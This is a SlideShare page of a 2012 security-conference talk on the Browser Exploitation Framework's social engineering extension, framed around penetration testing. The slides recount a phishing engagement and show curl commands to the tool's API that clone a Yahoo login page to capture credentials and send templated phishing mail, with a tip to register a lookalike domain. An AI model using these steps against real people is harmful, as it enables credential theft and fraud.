SlideShare une entreprise Scribd logo

I'm the butcher would you like some BeEF

Michele Orru
Michele Orru

This document describes using the Browser Exploitation Framework (BeEF) to conduct social engineering attacks. It introduces the creators and outlines how BeEF's web cloning and mass mailing extensions can be automated through a RESTful API to conduct phishing campaigns. Demostrations are provided of cloning a webpage to intercept login credentials, creating an HTML email template, and combining the extensions to send cloned phishing links at scale. The summary emphasizes automating social engineering attacks using BeEF's client-side exploitation abilities.

TechnologieBusiness
1  sur  33
Télécharger pour lire hors ligne
I’m the Butcher would you like some BeEF? 7th Sept 2012 - London Michele ‘antisnatchor’ Orru Thomas MacKenzie 1
Who are we Michele Orru The Butcher Thomas MacKenzie The Meat 2
Outline • A Social Engineering real story • BeEF intro • The new BeEF Social Engineering extension • Having fun with the RESTful API 3
Social Engineering • “Social engineering, in the context of security, is understood to mean the art of manipulating people into performing actions or divulging confidential information.” - Grandfather of all knowledge (Wikipedia). 4
Our Mission... • Tasked with gathering as many usernames and passwords as possible in a small amount of time • Tried calling and pretending to be person of authority but awareness seemed to be higher 5
So... • We heard great things about S.E.T. • Decided to use that to clone the website (but found some bugs and limitations that almost made it unusable) 6
Mass-Mailer • With the help of a colleague we then created a basic mass-mailer that used personalization, HTML, pictures and had the ability to spoof the domain name (thanks to their SMTP server settings :-) 7
We Won 8
But The IT Admin was like... • DO NOT CLICK ON THAT LINK 9
We then said (sending another email)... • DO CLICK ON THAT LINK 10
AND... WE WON AGAIN! 11
But... • We thought we could do it better and integrate some awesome client-side exploitation whilst we were at it... 12
Meet BeEF • Browser Exploitation Framework • Pioneered by Wade Alcorn in 2005 • Powerful platform for Client-side pwnage, XSS post-exploitation and generally victim browser security-context abuse. • The framework allows the penetration tester to select specific modules (in real- time) to target each browser, and therefore each context. 13
14
15
Meet BeEF • Demo 16
Social Eng. extension • The idea was to have some BeEF functionality that can be called via the RESTful API, in order to automate: • sending phishing emails using templates, • cloning webpages, harvesting credentials • client-side pwnage 17
AND... WE DID IT! 18
Social Eng. extension 19
BeEF web_cloner • Clone a webpage and serve it on BeEF, then automatically: • modify the page to intercept POST requests • add the BeEF hook to it • if the page can be framed, after POST interception load the original page on an overlay iFrame, otherwise redirect to original page 20
BeEF web_cloner • curl -H "Content-Type: application/json; charset=UTF-8" -d '{"url":"https:// login.yahoo.com/config/login_verify2", "mount":"/"}' -X POST http://<BeEF>/api/ seng/clone_page? token=53921d2736116dbd86f8f7f7f10e46f1 • If you register loginyahoo.com, you can specify a mount point of /config/ login_verify2, so the phishing url will be (almost) the same 21
BeEF web_cloner • Demo 22
BeEF mass_mailer • Do your phishing email campaigns • get a sample email from your target (with company footer...) • copy the HTML content in a new BeEF email template • download images so they will be added inline! • add your malicious links/attachments • send the mail to X targets and have fun 23
BeEF mass_mailer • email templates structure 24
BeEF mass_mailer • ‘default’ template HTML mail 25
BeEF mass_mailer • how the ‘default’ template email will look 26
BeEF mass_mailer • curl -H "Content-Type: application/json; charset=UTF-8" -d 'body' -X POST http://<BeEF>/api/ seng/send_mails?token=0fda00ea62a1102f { "template": "default", "subject": "Hi from BeEF", "fromname": "BeEF", "link": "http://www.microsoft.com/", "linktext": "http://beefproject.com", "recipients": [{ "user1@gmail.com": "Michele", "user2@antisnatchor.com": "Antisnatchor" }]} 27
BeEF mass_mailer • Demo 28
Combine everything FTW • Register your phishing domain • Point the A/MX records to a VPS where you have an SMTP server and BeEF • Create a BeEF RESTful API script that: • Clone a webpage link with web_cloner • Send X emails with that link with mass_mailer • Script intelligent attacks thanks to BeEF browser detection 29
Combine everything FTW • Last demo 30
BeEF web_cloner + mass_mailer + RESTful API = 31
Thanks • Wade to be always awesome • The other BeEF guys: Brendan, Christian, Ben, Saafan, Ryan, Heather • A few new project joiners: Bart Leppens, gallypette, Quentin Swain • Tom Neaves for the butcher/hook images :D 32
Questions? 33

Recommandé

Rooting Your Internals: Inter-Protocol Exploitation, custom shellcode and BeEF
Rooting Your Internals: Inter-Protocol Exploitation, custom shellcode and BeEF Rooting Your Internals: Inter-Protocol Exploitation, custom shellcode and BeEF
Rooting Your Internals: Inter-Protocol Exploitation, custom shellcode and BeEF
Michele Orru
 
Dark Fairytales from a Phisherman (Vol. II)
Dark Fairytales from a Phisherman (Vol. II)Dark Fairytales from a Phisherman (Vol. II)
Dark Fairytales from a Phisherman (Vol. II)
Michele Orru
 
Rooting your internals - Exploiting Internal Network Vulns via the Browser Us...
Rooting your internals - Exploiting Internal Network Vulns via the Browser Us...Rooting your internals - Exploiting Internal Network Vulns via the Browser Us...
Rooting your internals - Exploiting Internal Network Vulns via the Browser Us...
Michele Orru
 
Dark Fairytales from a Phisherman
Dark Fairytales from a PhishermanDark Fairytales from a Phisherman
Dark Fairytales from a Phisherman
Michele Orru
 
Buried by time, dust and BeEF
Buried by time, dust and BeEFBuried by time, dust and BeEF
Buried by time, dust and BeEF
Michele Orru
 
ZeroNights2012_BeEF_Workshop_antisnatchor
ZeroNights2012_BeEF_Workshop_antisnatchorZeroNights2012_BeEF_Workshop_antisnatchor
ZeroNights2012_BeEF_Workshop_antisnatchor
Michele Orru
 
Html5: Something wicked this way comes (Hack in Paris)
Html5: Something wicked this way comes (Hack in Paris)Html5: Something wicked this way comes (Hack in Paris)
Html5: Something wicked this way comes (Hack in Paris)
Krzysztof Kotowicz
 
WordPress security for everyone
WordPress security for everyoneWordPress security for everyone
WordPress security for everyone
Vladimír Smitka
 

Recommandé

Rooting Your Internals: Inter-Protocol Exploitation, custom shellcode and BeEF
Rooting Your Internals: Inter-Protocol Exploitation, custom shellcode and BeEF Rooting Your Internals: Inter-Protocol Exploitation, custom shellcode and BeEF
Rooting Your Internals: Inter-Protocol Exploitation, custom shellcode and BeEF
Michele Orru
 
Dark Fairytales from a Phisherman (Vol. II)
Dark Fairytales from a Phisherman (Vol. II)Dark Fairytales from a Phisherman (Vol. II)
Dark Fairytales from a Phisherman (Vol. II)
Michele Orru
 
Rooting your internals - Exploiting Internal Network Vulns via the Browser Us...
Rooting your internals - Exploiting Internal Network Vulns via the Browser Us...Rooting your internals - Exploiting Internal Network Vulns via the Browser Us...
Rooting your internals - Exploiting Internal Network Vulns via the Browser Us...
Michele Orru
 
Dark Fairytales from a Phisherman
Dark Fairytales from a PhishermanDark Fairytales from a Phisherman
Dark Fairytales from a Phisherman
Michele Orru
 
Buried by time, dust and BeEF
Buried by time, dust and BeEFBuried by time, dust and BeEF
Buried by time, dust and BeEF
Michele Orru
 
ZeroNights2012_BeEF_Workshop_antisnatchor
ZeroNights2012_BeEF_Workshop_antisnatchorZeroNights2012_BeEF_Workshop_antisnatchor
ZeroNights2012_BeEF_Workshop_antisnatchor
Michele Orru
 
Html5: Something wicked this way comes (Hack in Paris)
Html5: Something wicked this way comes (Hack in Paris)Html5: Something wicked this way comes (Hack in Paris)
Html5: Something wicked this way comes (Hack in Paris)
Krzysztof Kotowicz
 
WordPress security for everyone
WordPress security for everyoneWordPress security for everyone
WordPress security for everyone
Vladimír Smitka
 
BeEF_EUSecWest-2012_Michele-Orru
BeEF_EUSecWest-2012_Michele-OrruBeEF_EUSecWest-2012_Michele-Orru
BeEF_EUSecWest-2012_Michele-Orru
Michele Orru
 
Catch Me If You Can: PowerShell Red vs Blue
Catch Me If You Can: PowerShell Red vs BlueCatch Me If You Can: PowerShell Red vs Blue
Catch Me If You Can: PowerShell Red vs Blue
Will Schroeder
 
Pwning with powershell
Pwning with powershellPwning with powershell
Pwning with powershell
jaredhaight
 
Anthony Somerset - Site Speed = Success!
Anthony Somerset - Site Speed = Success!Anthony Somerset - Site Speed = Success!
Anthony Somerset - Site Speed = Success!
WordCamp Cape Town
 
Advanced Chrome extension exploitation
Advanced Chrome extension exploitationAdvanced Chrome extension exploitation
Advanced Chrome extension exploitation
Krzysztof Kotowicz
 
Improve WordPress performance with caching and deferred execution of code
Improve WordPress performance with caching and deferred execution of codeImprove WordPress performance with caching and deferred execution of code
Improve WordPress performance with caching and deferred execution of code
Danilo Ercoli
 
Obfuscating The Empire
Obfuscating The EmpireObfuscating The Empire
Obfuscating The Empire
Ryan Cobb
 
Mobile Hybrid Development with WordPress
Mobile Hybrid Development with WordPressMobile Hybrid Development with WordPress
Mobile Hybrid Development with WordPress
Danilo Ercoli
 
Domino Security - not knowing is not an option (2016 edition)
Domino Security - not knowing is not an option (2016 edition)Domino Security - not knowing is not an option (2016 edition)
Domino Security - not knowing is not an option (2016 edition)
Darren Duke
 
Introducing PS>Attack: An offensive PowerShell toolkit
Introducing PS>Attack: An offensive PowerShell toolkitIntroducing PS>Attack: An offensive PowerShell toolkit
Introducing PS>Attack: An offensive PowerShell toolkit
jaredhaight
 
Get-Help: An intro to PowerShell and how to Use it for Evil
Get-Help: An intro to PowerShell and how to Use it for EvilGet-Help: An intro to PowerShell and how to Use it for Evil
Get-Help: An intro to PowerShell and how to Use it for Evil
jaredhaight
 
Browser Fuzzing with a Twist (and a Shake) -- ZeroNights 2015
Browser Fuzzing with a Twist (and a Shake) -- ZeroNights 2015Browser Fuzzing with a Twist (and a Shake) -- ZeroNights 2015
Browser Fuzzing with a Twist (and a Shake) -- ZeroNights 2015
Jeremy Brown
 
WordPress performance tuning
WordPress performance tuningWordPress performance tuning
WordPress performance tuning
Vladimír Smitka
 
WordPress Development Tools and Best Practices
WordPress Development Tools and Best PracticesWordPress Development Tools and Best Practices
WordPress Development Tools and Best Practices
Danilo Ercoli
 
Cloud Device Insecurity
Cloud Device InsecurityCloud Device Insecurity
Cloud Device Insecurity
Jeremy Brown
 
B wapp – bee bug – installation
B wapp – bee bug – installationB wapp – bee bug – installation
B wapp – bee bug – installation
Ronan Dunne, CEH, SSCP
 
WordPress Security: Defend yourself against digital invaders
WordPress Security: Defend yourself against digital invadersWordPress Security: Defend yourself against digital invaders
WordPress Security: Defend yourself against digital invaders
Vladimír Smitka
 
WordPress Server Security
WordPress Server SecurityWordPress Server Security
WordPress Server Security
Peter Baylies
 
Kautilya: Teensy beyond shell
Kautilya: Teensy beyond shellKautilya: Teensy beyond shell
Kautilya: Teensy beyond shell
Nikhil Mittal
 
Dmk Bo2 K7 Web
Dmk Bo2 K7 WebDmk Bo2 K7 Web
Dmk Bo2 K7 Web
royans
 
Pentesting Android Applications
Pentesting Android ApplicationsPentesting Android Applications
Pentesting Android Applications
Cláudio André
 
Ps3 linux
Ps3 linuxPs3 linux
Ps3 linux
Keith Wright
 

Contenu connexe

Tendances

Browser Fuzzing with a Twist (and a Shake) -- ZeroNights 2015
Browser Fuzzing with a Twist (and a Shake) -- ZeroNights 2015Browser Fuzzing with a Twist (and a Shake) -- ZeroNights 2015
Browser Fuzzing with a Twist (and a Shake) -- ZeroNights 2015
Jeremy Brown
 
WordPress Development Tools and Best Practices
WordPress Development Tools and Best PracticesWordPress Development Tools and Best Practices
WordPress Development Tools and Best Practices
Danilo Ercoli
 
Cloud Device Insecurity
Cloud Device InsecurityCloud Device Insecurity
Cloud Device Insecurity
Jeremy Brown
 

Tendances (20)

BeEF_EUSecWest-2012_Michele-Orru
BeEF_EUSecWest-2012_Michele-OrruBeEF_EUSecWest-2012_Michele-Orru
BeEF_EUSecWest-2012_Michele-Orru
 
Catch Me If You Can: PowerShell Red vs Blue
Catch Me If You Can: PowerShell Red vs BlueCatch Me If You Can: PowerShell Red vs Blue
Catch Me If You Can: PowerShell Red vs Blue
 
Pwning with powershell
Pwning with powershellPwning with powershell
Pwning with powershell
 
Anthony Somerset - Site Speed = Success!
Anthony Somerset - Site Speed = Success!Anthony Somerset - Site Speed = Success!
Anthony Somerset - Site Speed = Success!
 
Advanced Chrome extension exploitation
Advanced Chrome extension exploitationAdvanced Chrome extension exploitation
Advanced Chrome extension exploitation
 
Improve WordPress performance with caching and deferred execution of code
Improve WordPress performance with caching and deferred execution of codeImprove WordPress performance with caching and deferred execution of code
Improve WordPress performance with caching and deferred execution of code
 
Obfuscating The Empire
Obfuscating The EmpireObfuscating The Empire
Obfuscating The Empire
 
Mobile Hybrid Development with WordPress
Mobile Hybrid Development with WordPressMobile Hybrid Development with WordPress
Mobile Hybrid Development with WordPress
 
Domino Security - not knowing is not an option (2016 edition)
Domino Security - not knowing is not an option (2016 edition)Domino Security - not knowing is not an option (2016 edition)
Domino Security - not knowing is not an option (2016 edition)
 
Introducing PS>Attack: An offensive PowerShell toolkit
Introducing PS>Attack: An offensive PowerShell toolkitIntroducing PS>Attack: An offensive PowerShell toolkit
Introducing PS>Attack: An offensive PowerShell toolkit
 
Get-Help: An intro to PowerShell and how to Use it for Evil
Get-Help: An intro to PowerShell and how to Use it for EvilGet-Help: An intro to PowerShell and how to Use it for Evil
Get-Help: An intro to PowerShell and how to Use it for Evil
 
Browser Fuzzing with a Twist (and a Shake) -- ZeroNights 2015
Browser Fuzzing with a Twist (and a Shake) -- ZeroNights 2015Browser Fuzzing with a Twist (and a Shake) -- ZeroNights 2015
Browser Fuzzing with a Twist (and a Shake) -- ZeroNights 2015
 
WordPress performance tuning
WordPress performance tuningWordPress performance tuning
WordPress performance tuning
 
WordPress Development Tools and Best Practices
WordPress Development Tools and Best PracticesWordPress Development Tools and Best Practices
WordPress Development Tools and Best Practices
 
Cloud Device Insecurity
Cloud Device InsecurityCloud Device Insecurity
Cloud Device Insecurity
 
B wapp – bee bug – installation
B wapp – bee bug – installationB wapp – bee bug – installation
B wapp – bee bug – installation
 
WordPress Security: Defend yourself against digital invaders
WordPress Security: Defend yourself against digital invadersWordPress Security: Defend yourself against digital invaders
WordPress Security: Defend yourself against digital invaders
 
WordPress Server Security
WordPress Server SecurityWordPress Server Security
WordPress Server Security
 
Kautilya: Teensy beyond shell
Kautilya: Teensy beyond shellKautilya: Teensy beyond shell
Kautilya: Teensy beyond shell
 
Dmk Bo2 K7 Web
Dmk Bo2 K7 WebDmk Bo2 K7 Web
Dmk Bo2 K7 Web
 

En vedette

Stickybits & altoids (12.1.10)
Stickybits & altoids (12.1.10)Stickybits & altoids (12.1.10)
Stickybits & altoids (12.1.10)
Steve Schlafman
 

En vedette (20)

Pentesting Android Applications
Pentesting Android ApplicationsPentesting Android Applications
Pentesting Android Applications
 
Ps3 linux
Ps3 linuxPs3 linux
Ps3 linux
 
Fleet Commander - Flock 2017
Fleet Commander - Flock 2017Fleet Commander - Flock 2017
Fleet Commander - Flock 2017
 
Centos 7 Installation Steps
Centos 7 Installation StepsCentos 7 Installation Steps
Centos 7 Installation Steps
 
DNSTap Webinar
DNSTap WebinarDNSTap Webinar
DNSTap Webinar
 
Stickybits + Altoids Case Study Dec 2010
Stickybits + Altoids Case Study Dec 2010Stickybits + Altoids Case Study Dec 2010
Stickybits + Altoids Case Study Dec 2010
 
Stickybits & altoids (12.1.10)
Stickybits & altoids (12.1.10)Stickybits & altoids (12.1.10)
Stickybits & altoids (12.1.10)
 
Why spending money on ads if you can hack the system?
Why spending money on ads if you can hack the system?Why spending money on ads if you can hack the system?
Why spending money on ads if you can hack the system?
 
Jana: Case Study Presentation
Jana: Case Study PresentationJana: Case Study Presentation
Jana: Case Study Presentation
 
Tools to hack a businessmodel
Tools to hack a businessmodelTools to hack a businessmodel
Tools to hack a businessmodel
 
20 new ways to unlock revenue
20 new ways to unlock revenue20 new ways to unlock revenue
20 new ways to unlock revenue
 
PowerDNS Webinar - Part 2
PowerDNS Webinar - Part 2PowerDNS Webinar - Part 2
PowerDNS Webinar - Part 2
 
Founders' conflict
Founders' conflictFounders' conflict
Founders' conflict
 
Growth Hacking using behavioral economics
Growth Hacking using behavioral economicsGrowth Hacking using behavioral economics
Growth Hacking using behavioral economics
 
DNS High-Availability Tools - Open-Source Load Balancing Solutions
DNS High-Availability Tools - Open-Source Load Balancing SolutionsDNS High-Availability Tools - Open-Source Load Balancing Solutions
DNS High-Availability Tools - Open-Source Load Balancing Solutions
 
What is new in BIND 9.11?
What is new in BIND 9.11?What is new in BIND 9.11?
What is new in BIND 9.11?
 
Guerrilla User and Design Research
Guerrilla User and Design ResearchGuerrilla User and Design Research
Guerrilla User and Design Research
 
Rh199 rhel 7
Rh199 rhel 7Rh199 rhel 7
Rh199 rhel 7
 
Raising a Seed Round from Lerer Ventures
Raising a Seed Round from Lerer VenturesRaising a Seed Round from Lerer Ventures
Raising a Seed Round from Lerer Ventures
 
79307422 2-wettability-literature-survey-part-1
79307422 2-wettability-literature-survey-part-179307422 2-wettability-literature-survey-part-1
79307422 2-wettability-literature-survey-part-1
 

Similaire à I'm the butcher would you like some BeEF

Antisnatchor all you ever wanted to know about beef
Antisnatchor all you ever wanted to know about beefAntisnatchor all you ever wanted to know about beef
Antisnatchor all you ever wanted to know about beef
DefconRussia
 
Beyond Bearer: Token Binding as the Foundation for a More Secure Web
Beyond Bearer: Token Binding as the Foundation for a More Secure WebBeyond Bearer: Token Binding as the Foundation for a More Secure Web
Beyond Bearer: Token Binding as the Foundation for a More Secure Web
Brian Campbell
 
Progressive Enhancement using WSGI
Progressive Enhancement using WSGIProgressive Enhancement using WSGI
Progressive Enhancement using WSGI
Matthew Wilkes
 
Concerto conmoto
Concerto conmotoConcerto conmoto
Concerto conmoto
mskmoorthy
 
eDevelopment.ppt
eDevelopment.ppteDevelopment.ppt
eDevelopment.ppt
BijayKc16
 

Similaire à I'm the butcher would you like some BeEF (20)

Antisnatchor all you ever wanted to know about beef
Antisnatchor all you ever wanted to know about beefAntisnatchor all you ever wanted to know about beef
Antisnatchor all you ever wanted to know about beef
 
Build Your First EE2 Site
Build Your First EE2 SiteBuild Your First EE2 Site
Build Your First EE2 Site
 
Building Chatbots
Building ChatbotsBuilding Chatbots
Building Chatbots
 
Chatbot Meetup
Chatbot MeetupChatbot Meetup
Chatbot Meetup
 
Continuous Integration with Cloud Foundry Concourse and Docker on OpenPOWER
Continuous Integration with Cloud Foundry Concourse and Docker on OpenPOWERContinuous Integration with Cloud Foundry Concourse and Docker on OpenPOWER
Continuous Integration with Cloud Foundry Concourse and Docker on OpenPOWER
 
Beyond Bearer: Token Binding as the Foundation for a More Secure Web
Beyond Bearer: Token Binding as the Foundation for a More Secure WebBeyond Bearer: Token Binding as the Foundation for a More Secure Web
Beyond Bearer: Token Binding as the Foundation for a More Secure Web
 
Chatbots
ChatbotsChatbots
Chatbots
 
Conversations as a Platform
Conversations as a PlatformConversations as a Platform
Conversations as a Platform
 
MDN Development & Web Documentation
MDN Development & Web DocumentationMDN Development & Web Documentation
MDN Development & Web Documentation
 
Solving Common Client Requets with jQuery Presentation (v2)
Solving Common Client Requets with jQuery Presentation (v2)Solving Common Client Requets with jQuery Presentation (v2)
Solving Common Client Requets with jQuery Presentation (v2)
 
Progressive Enhancement using WSGI
Progressive Enhancement using WSGIProgressive Enhancement using WSGI
Progressive Enhancement using WSGI
 
pentest
pentestpentest
pentest
 
Google App Engine and Social Apps
Google App Engine and Social AppsGoogle App Engine and Social Apps
Google App Engine and Social Apps
 
Concerto conmoto
Concerto conmotoConcerto conmoto
Concerto conmoto
 
Need to reboot your content creation strategy? Start with "No"
Need to reboot your content creation strategy? Start with "No"Need to reboot your content creation strategy? Start with "No"
Need to reboot your content creation strategy? Start with "No"
 
Создание API, которое полюбят разработчики. Глубокое погружение
Создание API, которое полюбят разработчики. Глубокое погружениеСоздание API, которое полюбят разработчики. Глубокое погружение
Создание API, которое полюбят разработчики. Глубокое погружение
 
PHP Unconference Continuous Integration
PHP Unconference Continuous IntegrationPHP Unconference Continuous Integration
PHP Unconference Continuous Integration
 
Serverless chatbot: from idea to production at blazing speed
Serverless chatbot: from idea to production at blazing speedServerless chatbot: from idea to production at blazing speed
Serverless chatbot: from idea to production at blazing speed
 
eDevelopment.ppt
eDevelopment.ppteDevelopment.ppt
eDevelopment.ppt
 
IKS UX sematics contest (finalist presentation)
IKS UX sematics contest (finalist presentation)IKS UX sematics contest (finalist presentation)
IKS UX sematics contest (finalist presentation)
 

Plus de Michele Orru

When you don't have 0days: client-side exploitation for the masses
When you don't have 0days: client-side exploitation for the massesWhen you don't have 0days: client-side exploitation for the masses
When you don't have 0days: client-side exploitation for the masses
Michele Orru
 
Advances in BeEF - AthCon2012
Advances in BeEF - AthCon2012Advances in BeEF - AthCon2012
Advances in BeEF - AthCon2012
Michele Orru
 
DeepSec2011_GroundBeEF
DeepSec2011_GroundBeEFDeepSec2011_GroundBeEF
DeepSec2011_GroundBeEF
Michele Orru
 
Hacktivity2011 be ef-preso_micheleorru
Hacktivity2011 be ef-preso_micheleorruHacktivity2011 be ef-preso_micheleorru
Hacktivity2011 be ef-preso_micheleorru
Michele Orru
 

Plus de Michele Orru (6)

Practical Phishing Automation with PhishLulz - KiwiCon X
Practical Phishing Automation with PhishLulz - KiwiCon XPractical Phishing Automation with PhishLulz - KiwiCon X
Practical Phishing Automation with PhishLulz - KiwiCon X
 
When you don't have 0days: client-side exploitation for the masses
When you don't have 0days: client-side exploitation for the massesWhen you don't have 0days: client-side exploitation for the masses
When you don't have 0days: client-side exploitation for the masses
 
Advances in BeEF - AthCon2012
Advances in BeEF - AthCon2012Advances in BeEF - AthCon2012
Advances in BeEF - AthCon2012
 
DeepSec2011_GroundBeEF
DeepSec2011_GroundBeEFDeepSec2011_GroundBeEF
DeepSec2011_GroundBeEF
 
Hacktivity2011 be ef-preso_micheleorru
Hacktivity2011 be ef-preso_micheleorruHacktivity2011 be ef-preso_micheleorru
Hacktivity2011 be ef-preso_micheleorru
 
Be ef presentation-securitybyte2011-michele_orru
Be ef presentation-securitybyte2011-michele_orruBe ef presentation-securitybyte2011-michele_orru
Be ef presentation-securitybyte2011-michele_orru
 

Dernier

EIS-Webinar-Prompt-Knowledge-Eng-2024-04-08.pptx
EIS-Webinar-Prompt-Knowledge-Eng-2024-04-08.pptxEIS-Webinar-Prompt-Knowledge-Eng-2024-04-08.pptx
EIS-Webinar-Prompt-Knowledge-Eng-2024-04-08.pptx
Earley Information Science
 
Strategies for Unlocking Knowledge Management in Microsoft 365 in the Copilot...
Strategies for Unlocking Knowledge Management in Microsoft 365 in the Copilot...Strategies for Unlocking Knowledge Management in Microsoft 365 in the Copilot...
Strategies for Unlocking Knowledge Management in Microsoft 365 in the Copilot...
Drew Madelung
 
08448380779 Call Girls In Civil Lines Women Seeking Men
08448380779 Call Girls In Civil Lines Women Seeking Men08448380779 Call Girls In Civil Lines Women Seeking Men
08448380779 Call Girls In Civil Lines Women Seeking Men
Delhi Call girls
 
The Role of Taxonomy and Ontology in Semantic Layers - Heather Hedden.pdf
The Role of Taxonomy and Ontology in Semantic Layers - Heather Hedden.pdfThe Role of Taxonomy and Ontology in Semantic Layers - Heather Hedden.pdf
The Role of Taxonomy and Ontology in Semantic Layers - Heather Hedden.pdf
Enterprise Knowledge
 
IAC 2024 - IA Fast Track to Search Focused AI Solutions
IAC 2024 - IA Fast Track to Search Focused AI SolutionsIAC 2024 - IA Fast Track to Search Focused AI Solutions
IAC 2024 - IA Fast Track to Search Focused AI Solutions
Enterprise Knowledge
 
Artificial Intelligence: Facts and Myths
Artificial Intelligence: Facts and MythsArtificial Intelligence: Facts and Myths
Artificial Intelligence: Facts and Myths
Joaquim Jorge
 

Dernier (20)

[2024]Digital Global Overview Report 2024 Meltwater.pdf
[2024]Digital Global Overview Report 2024 Meltwater.pdf[2024]Digital Global Overview Report 2024 Meltwater.pdf
[2024]Digital Global Overview Report 2024 Meltwater.pdf
 
EIS-Webinar-Prompt-Knowledge-Eng-2024-04-08.pptx
EIS-Webinar-Prompt-Knowledge-Eng-2024-04-08.pptxEIS-Webinar-Prompt-Knowledge-Eng-2024-04-08.pptx
EIS-Webinar-Prompt-Knowledge-Eng-2024-04-08.pptx
 
A Domino Admins Adventures (Engage 2024)
A Domino Admins Adventures (Engage 2024)A Domino Admins Adventures (Engage 2024)
A Domino Admins Adventures (Engage 2024)
 
Strategies for Unlocking Knowledge Management in Microsoft 365 in the Copilot...
Strategies for Unlocking Knowledge Management in Microsoft 365 in the Copilot...Strategies for Unlocking Knowledge Management in Microsoft 365 in the Copilot...
Strategies for Unlocking Knowledge Management in Microsoft 365 in the Copilot...
 
2024: Domino Containers - The Next Step. News from the Domino Container commu...
2024: Domino Containers - The Next Step. News from the Domino Container commu...2024: Domino Containers - The Next Step. News from the Domino Container commu...
2024: Domino Containers - The Next Step. News from the Domino Container commu...
 
08448380779 Call Girls In Civil Lines Women Seeking Men
08448380779 Call Girls In Civil Lines Women Seeking Men08448380779 Call Girls In Civil Lines Women Seeking Men
08448380779 Call Girls In Civil Lines Women Seeking Men
 
Data Cloud, More than a CDP by Matt Robison
Data Cloud, More than a CDP by Matt RobisonData Cloud, More than a CDP by Matt Robison
Data Cloud, More than a CDP by Matt Robison
 
The Role of Taxonomy and Ontology in Semantic Layers - Heather Hedden.pdf
The Role of Taxonomy and Ontology in Semantic Layers - Heather Hedden.pdfThe Role of Taxonomy and Ontology in Semantic Layers - Heather Hedden.pdf
The Role of Taxonomy and Ontology in Semantic Layers - Heather Hedden.pdf
 
A Call to Action for Generative AI in 2024
A Call to Action for Generative AI in 2024A Call to Action for Generative AI in 2024
A Call to Action for Generative AI in 2024
 
Powerful Google developer tools for immediate impact! (2023-24 C)
Powerful Google developer tools for immediate impact! (2023-24 C)Powerful Google developer tools for immediate impact! (2023-24 C)
Powerful Google developer tools for immediate impact! (2023-24 C)
 
04-2024-HHUG-Sales-and-Marketing-Alignment.pptx
04-2024-HHUG-Sales-and-Marketing-Alignment.pptx04-2024-HHUG-Sales-and-Marketing-Alignment.pptx
04-2024-HHUG-Sales-and-Marketing-Alignment.pptx
 
IAC 2024 - IA Fast Track to Search Focused AI Solutions
IAC 2024 - IA Fast Track to Search Focused AI SolutionsIAC 2024 - IA Fast Track to Search Focused AI Solutions
IAC 2024 - IA Fast Track to Search Focused AI Solutions
 
Bajaj Allianz Life Insurance Company - Insurer Innovation Award 2024
Bajaj Allianz Life Insurance Company - Insurer Innovation Award 2024Bajaj Allianz Life Insurance Company - Insurer Innovation Award 2024
Bajaj Allianz Life Insurance Company - Insurer Innovation Award 2024
 
🐬 The future of MySQL is Postgres 🐘
🐬 The future of MySQL is Postgres 🐘🐬 The future of MySQL is Postgres 🐘
🐬 The future of MySQL is Postgres 🐘
 
How to convert PDF to text with Nanonets
How to convert PDF to text with NanonetsHow to convert PDF to text with Nanonets
How to convert PDF to text with Nanonets
 
Scaling API-first – The story of a global engineering organization
Scaling API-first – The story of a global engineering organizationScaling API-first – The story of a global engineering organization
Scaling API-first – The story of a global engineering organization
 
Exploring the Future Potential of AI-Enabled Smartphone Processors
Exploring the Future Potential of AI-Enabled Smartphone ProcessorsExploring the Future Potential of AI-Enabled Smartphone Processors
Exploring the Future Potential of AI-Enabled Smartphone Processors
 
The 7 Things I Know About Cyber Security After 25 Years | April 2024
The 7 Things I Know About Cyber Security After 25 Years | April 2024The 7 Things I Know About Cyber Security After 25 Years | April 2024
The 7 Things I Know About Cyber Security After 25 Years | April 2024
 
Artificial Intelligence: Facts and Myths
Artificial Intelligence: Facts and MythsArtificial Intelligence: Facts and Myths
Artificial Intelligence: Facts and Myths
 
What Are The Drone Anti-jamming Systems Technology?
What Are The Drone Anti-jamming Systems Technology?What Are The Drone Anti-jamming Systems Technology?
What Are The Drone Anti-jamming Systems Technology?
 

I'm the butcher would you like some BeEF

  • 1. I’m the Butcher would you like some BeEF? 7th Sept 2012 - London Michele ‘antisnatchor’ Orru Thomas MacKenzie 1
  • 2. Who are we Michele Orru The Butcher Thomas MacKenzie The Meat 2
  • 3. Outline • A Social Engineering real story • BeEF intro • The new BeEF Social Engineering extension • Having fun with the RESTful API 3
  • 4. Social Engineering • “Social engineering, in the context of security, is understood to mean the art of manipulating people into performing actions or divulging confidential information.” - Grandfather of all knowledge (Wikipedia). 4
  • 5. Our Mission... • Tasked with gathering as many usernames and passwords as possible in a small amount of time • Tried calling and pretending to be person of authority but awareness seemed to be higher 5
  • 6. So... • We heard great things about S.E.T. • Decided to use that to clone the website (but found some bugs and limitations that almost made it unusable) 6
  • 7. Mass-Mailer • With the help of a colleague we then created a basic mass-mailer that used personalization, HTML, pictures and had the ability to spoof the domain name (thanks to their SMTP server settings :-) 7
  • 8. We Won 8
  • 9. But The IT Admin was like... • DO NOT CLICK ON THAT LINK 9
  • 10. We then said (sending another email)... • DO CLICK ON THAT LINK 10
  • 11. AND... WE WON AGAIN! 11
  • 12. But... • We thought we could do it better and integrate some awesome client-side exploitation whilst we were at it... 12
  • 13. Meet BeEF • Browser Exploitation Framework • Pioneered by Wade Alcorn in 2005 • Powerful platform for Client-side pwnage, XSS post-exploitation and generally victim browser security-context abuse. • The framework allows the penetration tester to select specific modules (in real- time) to target each browser, and therefore each context. 13
  • 14. 14
  • 15. 15
  • 16. Meet BeEF • Demo 16
  • 17. Social Eng. extension • The idea was to have some BeEF functionality that can be called via the RESTful API, in order to automate: • sending phishing emails using templates, • cloning webpages, harvesting credentials • client-side pwnage 17
  • 18. AND... WE DID IT! 18
  • 20. BeEF web_cloner • Clone a webpage and serve it on BeEF, then automatically: • modify the page to intercept POST requests • add the BeEF hook to it • if the page can be framed, after POST interception load the original page on an overlay iFrame, otherwise redirect to original page 20
  • 21. BeEF web_cloner • curl -H "Content-Type: application/json; charset=UTF-8" -d '{"url":"https:// login.yahoo.com/config/login_verify2", "mount":"/"}' -X POST http://<BeEF>/api/ seng/clone_page? token=53921d2736116dbd86f8f7f7f10e46f1 • If you register loginyahoo.com, you can specify a mount point of /config/ login_verify2, so the phishing url will be (almost) the same 21
  • 22. BeEF web_cloner • Demo 22
  • 23. BeEF mass_mailer • Do your phishing email campaigns • get a sample email from your target (with company footer...) • copy the HTML content in a new BeEF email template • download images so they will be added inline! • add your malicious links/attachments • send the mail to X targets and have fun 23
  • 24. BeEF mass_mailer • email templates structure 24
